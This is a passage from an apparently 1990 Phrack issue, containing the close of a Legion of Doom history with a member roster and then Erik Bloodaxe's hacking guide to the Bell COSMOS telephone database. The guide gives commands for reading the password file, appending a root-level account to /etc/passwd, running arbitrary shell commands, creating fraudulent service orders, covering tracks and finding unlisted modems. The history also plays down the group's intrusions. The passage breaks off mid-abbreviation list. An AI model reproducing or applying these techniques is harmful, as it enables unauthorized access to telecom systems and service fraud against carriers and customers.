  665. There is no indication that points to any resurgence in the future, but
  666. nothing is certain until summer.
  667. Since its creation, LOD has tried to put out informative files on a wide
  668. variety of topics of interest to its contemporaries.  These files ranged from
  669. the first actual scanned directory of Telenet, to files on various operating
  670. systems.  The LOD Technical Journal was to be a semi-regular electronic
  671. magazine comprised of such files, and other items of interest to the hacking
  672. community.  Only three issues of the Technical Journal were produced.  As
  673. the fourth issue was being pieced together, several members were raided, and
  674. work on it was abandoned.
  675. >From the time it was formed continuing up to the present, the Legion of
  676. Doom has been quite a topic of controversy in the computer underground and
  677. with computer security professionals.  The Legion of Doom has been
  678. called everything from "Organized Crime" to "a Communist threat to national
  679. security" to "an international conspiracy of computer terrorists bent
  680. on destroying the nation's 911 service."  Nothing comes closer to the
  681. actual truth than "bored adolescents with too much spare time."
  682. LOD members may have entered into systems numbering in the tens of
  683. thousands, they may have peeped into credit histories, they may
  684. have monitored telephone calls, they may have snooped into files and
  685. buffered interesting text, they may still have total control over
  686. entire computer networks; but, what damage have they done?  None, with
  687. the exception of unpaid use of CPU time and network access charges.  What
  688. personal gains have any members made?  None, with the exception of three
  689. instances of credit fraud that were instigated by three separate greedy
  690. individuals, without group knowledge.
  691. The Legion of Doom will long be remembered in the computer underground as
  692. an innovative and pioneering force, that consistently raised the collective
  693. level of knowledge, and provided many answers to questions ranging from the
  694. workings of the telephone system to the structure of computer operating
  695. systems.  No other group dedicated to the persuit of computer and
  696. telecommunications knowledge has survived longer, and none probably will.
  697. The Legion of Doom  1984--1990
  698. ------------------------------------------------------------------------------
  699.  
  700. Alumni of the Fraternal Order of the Legion of Doom  (Lambda Omega Delta)
  701. Handle                Entered   Exited    Location       Reasons for leaving
  702. ------------------------------------------------------------------------------
  703. Lex Luthor            Early 84--          Florida
  704. Karl Marx             Early 84--Late  85  Colorado       Bust w/Tabas..College
  705. Mark Tabas            Early 84--Late  85  Colorado       Too numerous to list
  706. Agrajag the Prolonged Early-84--Late  85  California     Loss of Interest
  707. King Blotto           Early 84--Late  85  Ohio           College
  708. Blue Archer           Early 84--Late  87  Texas          College
  709. EBA         Early 84--          Texas
  710. The Dragyn            Early 84--Late  86  Minnesota      Loss of Interest
  711. Unknown Soldier       Early 84--Early 85  Florida        Bust-Toll Fraud
  712. Sharp Razor           Late  84--Early 86  New Jersey     Bust-Compuserve Abuse
  713. Sir Francis Drake     Late  84--Early 86  California     Loss of Interest
  714. Paul Muad'dib         Late  84--Early 86  New York       Modem Broke
  715. Phucked Agent 04      Late  84--Late  87  California     College
  716. X-Man                 Late  84--Mid   85  New York       Bust-Blue Boxing
  717. Randy Smith           Late  84--Mid   85  Missouri       Bust-Credit Fraud
  718. Steve Dahl            Early 85--Early 86  Illinois       Bust-Credit Fraud
  719. The Warlock           Early 85--Early 86  Florida        Loss of Interest
  720. Terminal Man          Early 85--Late  85  Massachusetts  Expelled from Group
  721. Dr. Who               Early 85--Late  89  Massachusetts  Several Reasons
  722. The Videosmith        Early 86--Late  87  Pennsylvania   Paranoia
  723. Kerrang Kahn          Early 86--Mid   89  London, UK     Loss of Interest
  724. Gary Seven            Early 86--Mid   88  Florida        Loss of Interest
  725. The Marauder          Early 86--Mid   89  Connecticut    Loss of Interest
  726. Silver Spy            Late  86--Late  87  Massachusettts College
  727. Bill from RNOC        Early 87--Late  87  New York       Bust-Hacking
  728. The Leftist           Mid   87--Late  89  Georgia        Bust-Hacking
  729. Phantom Phreaker      Mid   87--          Illinois
  730. Doom Prophet          Mid   87--          Illinois
  731. Jester Sluggo         Mid   87--          North Dakota
  732. Carrier Culprit       Mid   87--Mid   88  Pennsylvania   Loss of Interest
  733. Master of Impact      Mid   87--Mid   88  California     Loss of Interest
  734. Thomas Covenant       Early 88--Early 90  New York       Bust-Hacking
  735. The Mentor            Mid   88--Early 90  Texas          Retired
  736. Necron 99             Mid   88--Late  89  Georgia        Bust-Hacking
  737. Control C             Mid   88--Early 90  Michigan
  738. Prime Suspect         Mid   88--          New York
  739. The Prophet           Mid   88--Late  89  Georgia        Bust-Hacking
  740. Phiber Optik          Early 89--Early 90  New York       Bust-Hacking
  741. ** AKA **
  742. Randy Smith           Poof!
  743. Dr. Who               Skinny Puppy
  744. Kerrang Kahn          Red Eye
  745. Phantom Phreaker      ANI Failure / Psychedelic Ranger
  746. Doom Prophet          Trouble Verify
  747. Thomas Covenant       Sigmund Fraud / Pumpkin Pete
  748. Necron 99             The Urvile
  749. Control C             Phase Jitter
  750.  
  751. _______________________________________________________________________________
  752.                                 ==Phrack Inc.==
  753.                   Volume Three, Issue Thirty-one, Phile #6 of 10
  754.  
  755.                         L    OO  DD
  756.                         L   O  O D D
  757.                         LLL  OO  DD
  758.                           PRESENTS
  759. ************************************************************
  760. ************************************************************
  761. ***                                                      ***
  762. ***                     TTT H H EEE                      ***
  763. ***                      T  H H E                        ***
  764. ***                      T  HHH EEE                      ***
  765. ***                      T  H H E                        ***
  766. ***                      T  H H EEE                      ***
  767. ***                                                      ***
  768. ***                                                      ***
  769. ***      DD   EEE FFF III N  N III TTT III V V EEE       ***
  770. ***      D D  E   F    I  NN N  I   T   I  V V E         ***
  771. ***      D  D EEE FFF  I  N NN  I   T   I  V V EEE       ***
  772. ***      D D  E   F    I  N NN  I   T   I  V V E         ***
  773. ***      DD   EEE F   III N  N III  T  III  V  EEE       ***
  774. ***                                                      ***
  775. ***                                                      ***
  776. ***          CCCC  OOO    SS  M   M  OOO    SS           ***
  777. ***         C     O   O  S  S MM MM O   O  S  S          ***
  778. ***         C     O   O   S   M M M O   O   S            ***
  779. ***         C     O   O S  S  M M M O   O S  S           ***
  780. ***          CCCC  OOO   SS   M   M  OOO   SS            ***
  781. ***                                                      ***
  782. ***                                                      ***
  783. ************************************************************
  784. ************************************************************
  785.                              BY
  786.                         ERIK BLOODAXE
  787. PRELUDE
  788. In the past, many files have been written about COSMOS.  I
  789. have always been rather disappointed in their quality and in
  790. their presentation, so I have taken on the responsibility of
  791. doing one myself.  This should sum up COSMOS for everyone who
  792. reads it.  It contains formats for very useful commands, an
  793. entire transaction list, COSMOS "tricks", and a list of all COSMOS
  794. abbreviations and their formats.
  795. =============================================================================
  796. INTRODUCTION
  797. Bell Labs COmputer System for Mainframe OperationS  (COSMOS)
  798. is basically just a database for maintaining records of
  799. equipment and other line information and generating reports
  800. on that information.  The system is usually set up on a DEC
  801. PDP 11/45 or 11/70.
  802. The main responsibilities of the COSMOS system are:
  803.               Maintaining records
  804.               Issuing reports
  805.               Processing service and work orders
  806.               Assigning telephone numbers
  807.               Load balancing for switching computers
  808.               Output of ESS recent change information
  809. LOGGING ON
  810. When connecting to COSMOS the system will respond with:
  811. ;Login:  or  LOGIN:
  812. at which point you enter a username.  The system will then
  813. prompt:
  814. PASSWORD:
  815. at which point you enter the password for that username.
  816. Finally, the system will prompt:
  817. WC?
  818. which asks you to enter the wire center for the exchange you
  819. will be using in your work.  After successfully completing
  820. the login sequence you will be given the system prompt which
  821. will be the two letter id of the wire center you entered and a
  822. percent sign:  "WC% "
  823. To log off at this or at any point you can type control-y.
  824. One of the major flaws in COSMOS security is that unless a
  825. control-y is received the terminal is not logged out, even if
  826. the user disconnects.  Many times when you connect to COSMOS,
  827. you will be dropped right into the "WC% " prompt.  This even
  828. happens on major BOC packet networks quite often.  If you are
  829. lucky enough to receive a 'WC#' prompt you have access to the
  830. COSNIX shell, and can issue various unix-like commands, like
  831. ls, cd, cat, et cetera.
  832. COSMOS usernames are usually issued as two letters corresponding to
  833. whatever center will be using that account, and two numbers.
  834. EX:  LA01
  835. Using the above example "LA01" there will most probably be numerous
  836. "LA" accounts, possibly "LA01" through "LA15" or higher.  This is true
  837. for most COSMOS usernames.  More often than not, all accounts used by the
  838. same center will have the same password as well.  Some common usernames
  839. and their owners are:
  840.               ROOT     System Manager
  841.               SYS      System Manager
  842.               ML       Loop Assignment
  843.               LA       Loop Assignment
  844.               DN       Main Distributing Frame
  845.               IN       Repair Service
  846.               RS       Repair Service
  847.               CE       LNAC
  848.               LK       Account to execute INQuiries only
  849.               JA       Mizar
  850.               WLI      Work Load Indicator
  851. Usernames may vary from BOC to BOC, but these are fairly standard.
  852. =============================================================================
  853. COSMOS TRANSACTION COMMANDS
  854. COSMOS commands are three letter acronyms.  I will explain in
  855. depth the commands I have found most useful, and then list
  856. the remainder.  Remember, do not attempt to learn the formats for COSMOS
  857. transactions online.  You will probably not figure out correct inputs, and
  858. will most likely cause problems for the system manager and yourself.
  859. Commands are entered in a specific ways.  The command desired is
  860. entered at the WC% prompt.  A second string of data is entered at
  861. the next line which designates the type of transaction desired.
  862. This line is prefixed with on of the following four letters:
  863. H - Header Line
  864. I - In Line
  865. O - Out Line
  866. R - Remark Line
  867. The most commonly used line is the H line.  It is a required input in
  868. almost all COSMOS transactions.  From the second line on, COSMOS will
  869. prompt with an underscore "_" as the system prompt, to let the user
  870. know that it is waiting for input.  When all needed data has been entered,
  871. the command is executed by typing a "." at the beginning of a new line.
  872. If you wish to process a command, but stay in command level in order to
  873. process further commands after the one you are currently entering has
  874. finished, a ";" can be entered at the beginning of a new line.
  875. To cancel the transaction you are entering, a "Q" should be entered at
  876. the beginning of a new line.  To interrupt output, the break character
  877. is "^C".  When entering criteria, you may enter all like data (all H-line, all
  878. I-line, etc...) on one line using a "/" between input prefixes:
  879. EX:  H TN 222-0000,222-9999/RMKT SWBT?/US 1FB
  880. is the same as entering:
  881. H TN 222-0000,222-9999
  882. _H RMKT SWBT?
  883. _H US 1FB
  884. One of the most commonly used commands is INQ (Complete
  885. Circuit Inquiry).  There is also a short form of INQ called
  886. ISH.  This command requires only the use of H lines.  Multiple H lines
  887. can be entered to narrow a search or to print multiple reports.
  888. Valid H line facilities used are:
  889.               BL       Bridge Lifter
  890.               CON      Concentrator
  891.               CP       Cable Pair
  892.               CKID     Circuit ID
  893.               MR       Message Register
  894.               OE       Office Equipment Number
  895.               PL       Private Line Circuit Number
  896.               TK       Trunk Cable and Pair Number
  897.               TN       Telephone Number
  898.               TP       Tie Pair
  899.               XN       "X" Number
  900.               TRE      Transmission Equipment
  901.               TER      Terminal Number
  902.               GP       Group Number
  903.               ORD      Work Order
  904. EX:  To print information on telephone number 222-2222
  905. WC% INQ
  906. H TN 222-2222
  907. _.
  908. EX:  To print information on cable pair 11-1111
  909. WC% INQ
  910. H CP 11-1111
  911. _.
  912. INQ will print a full report whatever circuit you examine, while ISH
  913. will print a shorter, easier to read report.  Below is an actual ISH
  914. done on a Telenet node.
  915. CA% ISH
  916. H TN 225-8004
  917. _.
  918. TN   225-8004
  919.      ST  AU          DATE 06-03-83   HT GP 0-0081    BTN 225-8004    TYPE X
  920. OE   006-012-200
  921.      ST  WK          DATE 03-04-86   CS 1FBH     US 1BH       FEA TNNL
  922.      LCC TF2
  923.      LOC WF12003
  924. TER  0-0081-0001
  925.      ST  WK
  926.      RMKG GTE.TELENET
  927. CP   95-0701
  928.      ST  WK          DATE 01-24-86    RZ 13
  929.      LOC WF12009
  930. TP   6105-0910
  931.      ST  WK          DATE 01-24-86
  932.      LOC  F12003
  933.      LOC  F42001
  934.      FROM FAC OE  006-012-200     TO FAC TP  6206-0107
  935. TP   6206-0107
  936.      ST  WK          DATE 01-24-86
  937.      LOC  F22029
  938.      LOC  F42002
  939. HUNT SEQUENCE FOR TN 225-8004
  940.   TER 0001-0040
  941. ** ISH COMPLETED 02-29-99  12:00
  942. CA%
  943. When you pull an inquiry on a number that you are interested in, you will
  944. be given its cable pair, its order number, any numbers that connect to
  945. it through a hunt sequence, and you will see any remarks entered about the
  946. number.  This information can prove to be very valuable.  For instance:
  947. You suspect that a company has a modem online, yet you don't want to waste
  948. time sequentially dialing thousands of numbers.  You can simply enter
  949. an ISH on the number to get its cable pair, then begin pulling ISH
  950. reports on cable pairs close to the main one.  Then you need only dial
  951. twenty or so numbers that are in the same area as the main number, and
  952. you will find the computer.
  953. Another extremely valuable command is SIR (Sorting Inquiry by Range).
  954. With SIR, you can print the circuit information on all lines that match
  955. specified criteria within a specified range of numbers.  This command
  956. requires only H line input, but numerous lines may be entered in order to
  957. narrow down the search.  You may also use the wildcard character ("?") to
  958. encompass a larger range when doing a SIR.  There are many applications
  959. for SIR, but I will only show examples on a few I have found to be
  960. most useful.
  961. Many times entries have special remarks entered about the circuit.  These
  962. are usually entered as RMKT (Remarks on Telephone Number), but they may be
  963. entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable
  964. Pair), depending upon what the person entering felt like typing.
  965. Most of the time the remarks really don't correspond like they should.
  966. Telephone companies are pretty thorough about remarking on a line that
  967. they own and they will usually use the RMKT prefix.
  968. EX:  To find all telephone company (Southwestern Bell) lines in prefix 222
  969. WC% SIR
  970. H TN 222-0000,222-9999
  971. _H RMKT SWBT?
  972. _.
  973. The "?" after SWBT acts as a wildcard.  Typing SWB? would perform the same
  974. search.
  975. You may also want to search by STT (Telephone number status).  Some types of
  976. STT are:
  977.               AU   Auxiliary
  978.               NP   Non-published
  979.               OF   Official (telco owned)
  980.               TS   Test
  981. Another way to distinguish types of number is by CS (Customer Class of
  982. Service).  CS values tend to vary from BOC to BOC, but business lines
  983. will usually look like "1FB", or at least contain a "B".  Residences
  984. will usually look like "1FR."  Sometimes telco lines are listed as "1OF",
  985. but may also be entered as "1FB".  On lines in a hunt group, the CS will
  986. be appended with the letter "H", as "1FBH".
  987. Let's say a company owns a block on an exchange (333) running from 1000 to
  988. 3500.  You want to find all possible computer numbers in that area.  Chances
  989. are good that they are not listed.
  990. EX:
  991. WC% SIR
  992. H TN 333-1000,333-3500
  993. _H STT NP
  994. _H CS 1FB
  995. _.
  996. The above would list all non-published business numbers from 333-1000
  997. to 333-3500.
  998. To find all numbers that are translated 800 numbers in the same prefix range
  999. as above, you can do the following:
  1000. EX:
  1001. WC% SIR
  1002. H TN 333-1000,333-3500
  1003. _H PL ?800?
  1004. _.
  1005. This will prints reports on all private lines registered as 800 numbers.
  1006. There is also a shorter version of SIR, LTN (List Telephone Numbers), and a
  1007. more detailed version, GFR (General Facility Report), but I have found
  1008. SIR to be the better of the three to use for my purposes.
  1009. In order to change line attributes, or to create new lines you will need
  1010. to use two commands SOE (Service Order Entry), and RCP (Recent Change
  1011. Packager).  These two commands are pretty detailed in what they can do,
  1012. so I will just cover a few of their options.
  1013. SOE will allow you to assign a new circuit, and specify the desired telephone
  1014. number, custom calling features, billing telephone number, etc.
  1015. SOE requires both "H" and "I" lines of input.  The best way to enter
  1016. a new service order is to have COSMOS pick your new telephone number and
  1017. assign the needed office equipment number.  If you want to pick your own
  1018. telephone number, the number you pick must have a status (STO) of SP, LI, RS,
  1019. or PD (with a disconnect date before the due date on your new service order).
  1020. This is so that you do not try to assign a number that is currently working
  1021. to your new service order.  You can check this by doing an ISH on all the
  1022. variations of numbers you desire, and checking the STO.  You can also get a
  1023. list of available numbers in a given prefix using the NAI command.  You
  1024. should also do a SIR of recent entries, to try to find the proper format of
  1025. order numbers, so that you do not reuse one, or make one up that is formatted
  1026. incorrectly.  Another method to make sure that you have the correct formatting
  1027. of order numbers is to call the phone company and request the installation of
  1028. a line in the area you are working in.  They will tell you your service order
  1029. number for reference.  Later, you can merely cancel the order.  You will also
  1030. have to find a valid cable pair, so do an ISH on whatever number written in
  1031. your junction box that is not working, and then make sure there is no pending
  1032. connect orders entered on it.
  1033. To enter a service order for a new connection, having COSMOS pick an available
  1034. telephone number and assign proper office equipment numbers, you would do
  1035. the following:
  1036. EX:
  1037. WC% SOE
  1038. H ORD SO123456/OT NC/DD DD-MM-YY   (Use valid Day, Month, Year for Due Date)
  1039. _I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY   (Use valid cable pair for XX-YYYY)
  1040. _.
  1041. You would now need to enter RCP and make a correctly formatted recent change
  1042. report for the order you entered so RCMAC can pick up the order and directly
  1043. enter it into the switch.  What RCP does is take your order and change it into
  1044. actual switch programming, using templates that are stored in directories
  1045. corresponding to what type of switching equipment is used for that WC.
  1046. (EX:  ess5a)
  1047. EX:  To create a recent change package for the order entered above
  1048. WC% RCP
  1049. H ORD SO123455
  1050. _.
  1051. Using SOE you can specify custom calling features, you can specify billing
  1052. telephone numbers, you can establish service as coin, and several other
  1053. options by adding "I" line information corresponding to that particular
  1054. option.
  1055.               _I CCF XXXXXX       (XXXXXX is valid custom calling features)
  1056.               _I BTN NNX-XXXX     (NNX-XXXX is valid billing TN)
  1057.               _I TT C
  1058. To get a list of spare (available) telephone numbers in a given prefix, you
  1059. can use the NAI (Telephone Number Assignment Inquiry) command.  You only need
  1060. enter H line criteria.  In addition to searching by prefix (NNX), you can
  1061. search by switch type (TYP), or rate zone (RTZ).
  1062. EX:  To select one spare telephone number in 555 and make it reserved status
  1063. WC% NAI
  1064. H TT X/NNX 555/STT RS
  1065. _.
  1066. You may also have NAI print out several available numbers, however, you cannot
  1067. change the status unless you are printing one listing.
  1068. EX:
  1069. WC% NAI
  1070. H TT X/NNX 555/LC XX        (Where XX is a number between 1 and 25)
  1071. _.
  1072. To get a listing of all prefixes that exist in the Wire Center you are
  1073. logged in under, you can use the command DDS (Display DS Table).  This
  1074. command will list the ranges that exist for a given input.
  1075. To list all telephone numbers in a given WC:
  1076. WC% DDS
  1077. H TN ?
  1078. _.
  1079. To list all cable pair ranges:
  1080. WC% DDS
  1081. H CP ?
  1082. _.
  1083. To change from one Wire Center to another, you use the command WCC (Wire
  1084. Center Change).  This is a very straight forward command.
  1085. EX:
  1086. WC% WCC NW
  1087. NW%
  1088. To allow for redirection in your COSMOS commands, you must execute the
  1089. DIO command.  This command is rather important for manipulating commands
  1090. to work for you.
  1091. EX:
  1092. WC% DIO
  1093. To see what transactions other people logged in are running, you can use the
  1094. command TSNAP (on certain generics)
  1095. EX:
  1096. WC% TSNAP
  1097. There are about one hundred other COSMOS commands that are all defined at the
  1098. end of this file.  I cannot go into detail on all of them but I will list them
  1099. and their meanings.
  1100. =============================================================================
  1101. COSMOS TRICKS
  1102. Even if you don't have full COSNIX access, you can basically execute
  1103. any command or read any file that exists in the system.  Using the INQ
  1104. (or ISH) command and redirection, you can open and display any file.
  1105. EX:  To display the password file
  1106. WC% INQ </ETC/PASSWD
  1107. This will display the file, however, since this is a flaw in the command,
  1108. it thinks the file is to be input for INQ, and each line will be preceded
  1109. with "ILLEGAL LINE TYPE", but this can be ignored.
  1110. Other files to look at:
  1111. /USR/FACS/WCFILE     List of all Wire Centers
  1112. /ETC/MATRIX.P        Permission Matrix (Who can execute what commands)
  1113. You may or may not want to try the following.  There is a high probability
  1114. that you will be noticed on the system.  If your local COSMOS ports are
  1115. usually left logged in, don't bother doing this.  However, if your COSMOS
  1116. ports are always logged out, and you almost never get in, and you happen
  1117. to stumble upon one left logged for the first time in months, it might be
  1118. worth a try.
  1119. There are a few ways to make a new account on COSMOS; however, you need to
  1120. be able to write to the password file.  Some systems allow this, but most do
  1121. not.
  1122. The easiest way involves using the echo command and redirection.
  1123. EX:
  1124. WC% echo "EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd
  1125. This will add user EB01 to the end of the password file.
  1126. If you do not have access to echo you can do the same thing using the TED
  1127. command (Text Editor).
  1128. WC% TED >>/etc/passwd
  1129. S.O. NO.= SO123456
  1130. IS THIS A NEW S.O. (Y on NO) Y
  1131. 1d
  1132. a
  1133. EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so
  1134. ^C
  1135. 1p
  1136. w
  1137. q
  1138. After executing the above, you will need to clean up the /etc/passwd
  1139. file to remove the Service Order information put in there by TED.  You will
  1140. also need to remove the service order you created from the /usr/so/WC
  1141. directory.
  1142. If you cannot find a way to get shell access, you can still execute
  1143. any COSNIX command you desire again using TED, MSK (Output a Transaction
  1144. Mask), and ARG (Assemble and Run a Given Master File).
  1145. EX:
  1146. WC% TED
  1147. S.O. NO.= SO123456
  1148. IS THIS A NEW S.O. (Y or NO) Y
  1149. 12
  1150. 1d
  1151. a
  1152. $*
  1153. run!
  1154. ^c
  1155. w
  1156. q
  1157. WC% MSK >/usr/so/newcmd
  1158. SO123456
  1159. WC% ARG
  1160. newcmd ls /etc
  1161. To execute the command, you need to do ARG, then the name of the
  1162. file (which I called newcmd), then the COSNIX command you wish to
  1163. execute.
  1164. If you can use echo this can be done much easier.
  1165. EX:
  1166. WC% echo '$*' >/usr/so/newcmd
  1167. WC% echo 'run!' >>/usr/so/newcmd
  1168. Then you can run your command normally with ARG.
  1169. WC% ARG
  1170. newcmd cd ..
  1171. IF you do not have access to echo, create a newcmd file and you can use it
  1172. that way.
  1173. WC% ARG
  1174. newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd
  1175. =============================================================================
  1176. COSMOS COMMAND LISTING
  1177. ACE  Establish an Assignment Change Ticket
  1178. AIT  ANALIT Initialization of Tables
  1179. ARG  Assemble and Run a Given Master File
  1180. AUD  Assignment List Audit
  1181. BAI  Bridge Lifter Assignment Inquiry
  1182. BYF  Display the Bypass File
  1183. BYP  Change the Contents of the Bypass File
  1184. CAY  Create an Assembly
  1185. CCA  Change Customer Attributes
  1186. CCT  Initialize and Update the Contractor-Transducer File
  1187. CDA  Change Distribution Attributes
  1188. CDD  Change Due Date
  1189. CDR  Cut Thru DIP Report
  1190. CFA  Change Facility Attributes
  1191. CFP  Print the Class of Service/Features for an Electromechanical Entity
  1192. CFU  Change Facility Usage
  1193. CIE  Company Establish Company Initiated Change
  1194. CLI  COSMOS Processed ALIT Reports
  1195. CPI  COSMOS-PREMIS Interface
  1196. CPM  COSMOS Performance Monitor
  1197. CTC  Complete a Cable Transfer or Complete a Cable Throw
  1198. CTE  Cable Throw Order Establishment
  1199. CTF  Display the Contacter-Transducer File
  1200. CTL  Cable Throw with Line Equipment Assignment
  1201. CTM  Cable Throw Modification
  1202. CTP  Print Cable Transfer Frame Work
  1203. CTR  Cable Throw Replacement
  1204. CTS  Cable Throw Summary
  1205. CTW  Withdraw a Cable Transfer or a Cable Throw
  1206. CUP  Common Update Processor
  1207. CXC  Complex Service Order Input Checker
  1208. CXM  Centrex Table Management
  1209. CXT  Complex Order Inquiry for NAC Review
  1210. DAY  Delete an Assembly
  1211. DBL  Data Base Load
  1212. DCN  List Disconnected and Changed Numbers
  1213. DDS  Display the DS Table
  1214. DIR  Standard DIP Report
  1215. DPN  DIP Purge Number
  1216. DPR  DIP Report and Removal
  1217. DQR  Design Quota System Report
  1218. DQS  Design Quota System
  1219. DTE  Print Current Date
  1220. EDZ  Facility Emergency Assignment List
  1221. ELA  Entity Load Analysis
  1222. ESP  Print Entire Summary Table
  1223. FDY  Set Fiscal Day for LAC
  1224. FLR  Frame Layout Report
  1225. FOR  Frame Order Report
  1226. FOS  Frame Operations Summary
  1227. FTA  Frame Transfer Analysis
  1228. FTC  Frame Transfer Completion
  1229. FTE  Frame Transfer Establishment
  1230. FTL  Frame Transfer LETs
  1231. FTR  Frame Transfer Reprint
  1232. FTW  Frame Transfer Withdrawal
  1233. FWM  Frame Work Management
  1234. GFR  General Facility Report
  1235. GLA  Generate Lists for Assignment
  1236. HBS  Hunt Group Blocks of Spares
  1237. HGR  Hunt Group Report
  1238. HGS  Hunt Group Summary
  1239. HIS  Hunting ISH
  1240. IJR  Input a Jeopardy Reason
  1241. IMU  Input Measured CCS Usage Data
  1242. INQ  Complete Circuit Inquiry
  1243. ISF  Inquire on a Single Facility
  1244. ISH  Complete Circuit Inquiry Short
  1245. JAM  Jumper Activity Management
  1246. JPH  Jumper Placement History
  1247. KPR  Killer Pair Report
  1248. KSM  Create a Transaction Mask
  1249. LAI  Line Equipment Assignment Inquiry
  1250. LBP  Load Balance Parameters
  1251. LCD  LIST Cable Summary, LIT Demand Test
  1252. LCP  List Cable Pairs
  1253. LEE  NAC Related Line Equipment Transfer Order Establishment
  1254. LEW  Line Equipment Transfer Withdrawal
  1255. LFC  Load Factor Calculation
  1256. LFR  Line Failure Report
  1257. LGN  List Hunt Groups
  1258. LIN  Transmit ALIT Data to COSMOS
  1259. LOE  List Originating Line Equipment
  1260. LSE  Line and Station Transfer Order Establishment
  1261. LSW  Line and Station transfer Withdrawal
  1262. LTN  List Telephone Numbers
  1263. MAL  Manual Assignment List
  1264. MAP  Manual Assignment Parameters
  1265. MAQ  Manual Assignment File Inquiry
  1266. MAY  Modify an Assembly
  1267. MCE  Establish a Maintenance Change Ticket
  1268. MCH  Manually Change Hunt
  1269. MCL  Maintenance Change List
  1270. MCR  Establish a Maintenance Change Repair
  1271. MCW  Maintenance Change Ticket Withdrawal
  1272. MDC  Manually Disconnect a Working Circuit
  1273. MEC  Manually Establish a Circuit
  1274. MMC  Manually Modify a Circuit
  1275. MOC  MOE Order Completion
  1276. MOE  Mass OE Transfers
  1277. MOF  Mass OE Frame Transfer Listings
  1278. MOW  MOE Order Withdrawal
  1279. MPK  Modify Work Package
  1280. MSK  Output a Transaction Mask
  1281. MTR  Manually Test a Response
  1282. NAI  Telephone Number Assignment Inquiry
  1283. NOL  NAC Service Order Listing
  1284. NSD  Number Summary Display
  1285. OIJ  Orders in Jeopardy
  1286. OPN  Open-of-Day Report
  1287. OPU  Outside Plant Cable Usage
  1288. PAK  Work Packages
  1289. PEP  Position Establishment for Parties
  1290. PFR  Party Line Fill Report
  1291. PRP  Periodic Purging of Remarks
  1292. QEX  Question an Execution
  1293. QUE  Queue
  1294. RAL  Relay Assignment List
  1295. RAP  Relay Assignment Parameters
  1296. RAS  Release Sequence Number Lists and Related TN/OE
  1297. RBS  Print TBS Relays Assignment Record
  1298. RCP  Recent Change Packager
  1299. RCR  Recent Change Report
  1300. RCS  Recent Change Summary
  1301. RED  Recent Change Message Text Editor
  1302. REL  Release Non-Intercepted Numbers by Release Date
  1303. REM  Remove Frame Locations
  1304. RET  Retermination of Frame Locations
  1305. REX  Reexecute a Service Order
  1306. RJR  Remove Jeopardy Reason Codes
  1307. RMP  Recent Change Punctuation Table
  1308. RNA  Release Telephone Numbers for Assignment
  1309. ROE  Reservation Order Establishment
  1310. ROI  Reservation Order Inquiry
  1311. ROW  Reservation Order Withdrawal
  1312. RTH  Report Transaction to Count Spare and DIPed Line Equipment
  1313. RTS  Relay and Telephone Number Status Report
  1314. RUP  Request Unsolicited Processing
  1315. SAI  Summary of Action Items
  1316. SCA  Service Order Completion-Automatic
  1317. SCF  Simple Completion for MDF
  1318. SCI  Spare Cable Pair Inquiry
  1319. SCM  Standard Completion by MDF
  1320. SCP  Service Order Completion by LAC
  1321. SCR  Standard Completion by RCMAC
  1322. SEL  Selecting Lines for an Exchange Class of Service Study
  1323. SET  Statistics on Equipment and Telephone Numbers
  1324. SGH  Supply Relays for Groups of 5XB Hunts
  1325. SIR  Sorting Inquiry by Range
  1326. SLC  Subscriber Line Counts for Custom Calling Features
  1327. SOC  Service Order Cancel
  1328. SOE  Service Order Establishment
  1329. SOF  Service Order Fix
  1330. SOH  Service Order Withheld
  1331. SOI  Service Order Assignment Inquiry
  1332. SOL  Service Order Listing
  1333. SOM  Modify a Pending Service Order
  1334. SOW  Service Order Withdrawal
  1335. STN  Summarize Telephone Numbers
  1336. SVL  Service Observing Loops
  1337. TAI  Tie Pair Assignment Inquiry
  1338. TAT  Test Alignment of Frame Terminal
  1339. TED  Text Editor
  1340. TET  Display or Change Band Filter File, Retention Factor and Print Threshold
  1341. TFC  Transfer Frame Changes
  1342. TIG  Dial Transfer Input Generator
  1343. TLC  Translate LANAVAR/CPS
  1344. TNS  Telephone Number Swap
  1345. TOC  Transfer Order Completion
  1346. TOE  Transfer Order Establishment
  1347. TOF  Mass OE Transfer Order Frame Listings
  1348. TOI  Dial Transfer Order Inquiry
  1349. TOL  Transfer Order Lists
  1350. TOO  Transfer Order Omissions
  1351. TOW  Transfer Order Withdrawal
  1352. TPU  Tie Pair Usage Report
  1353. TRC  Transfer Order Recent Change Report
  1354. TRI  Transmission Equipment Assignment Inquiry
  1355. TRW  Total Reservation Order Withdrawal
  1356. TSL  Line Equipment Summary Report
  1357. TSN  Traffic Statistics on Telephone Numbers
  1358. TSW  Total Service Order Withdrawal
  1359. TTY  Get TTY Name
  1360. TXC  Text Checker
  1361. TXM  Transfer Centrex Management
  1362. UDP  Update DIP Parameters
  1363. UES  Update the Entity Summary Table
  1364. UFO  Unprinted Frame Orders
  1365. UPC  Update CCS vs. Class of Service Table
  1366. USL  List USOC (US) File Data
  1367. UTC  Update Table for Concentrator Redesign
  1368. WCC  Change Wire Center
  1369. WCT  Worksheet for Cable Throw Orders
  1370. WFL  Working Frame Location
  1371. WOI  Work Order Inquiry
  1372. WOL  Work Order Listing
  1373. WPT  Work Package Table
  1374. WSL  Work Status List
  1375. WUL  Work Unit Report for Subscriber Line Testing and Installation Assignment
  1376. =============================================================================
  1377. COSMOS ABBREVIATIONS AND FORMATS
  1378. The following will be given as follows:
  1379. Prefix and Meaning
  1380. Format
  1381. Code Value and Meaning
  1382. AC   Assembly category
  1383.      AC XXXX
  1384.      PERM=Permanent Facility Assemblies
  1385.      TEMP=Temporary Facility Assemblies
  1386. AC   Assembly Code
  1387.      AC XXX
  1388.      XXX=1-999
  1389. ADSR Administration of Designed Services Review
  1390.      ADSR X
  1391.      Y=Yes, TIRKS Circuit
  1392.      N=No, COSMOS Circuit
  1393. AGM  Normal Aging Months
  1394.      AGM XX
  1395.      XX=Number of Months
  1396. AGT  Accelerated Aging Type
  1397.      AGT XXX
  1398.      BUS=Business
  1399.      RES=Residential
  1400. AI   Assigner's Initials
  1401.      AI XXX
  1402.      XXX=3 Alphanumeric Characters
  1403. AO   Allocation Order
  1404.      AO XX
  1405.      XX=Two Numeric Characters
  1406. AR   Advance Relay
  1407.      AR XYY-ZZZ
  1408.      X=Marker Group
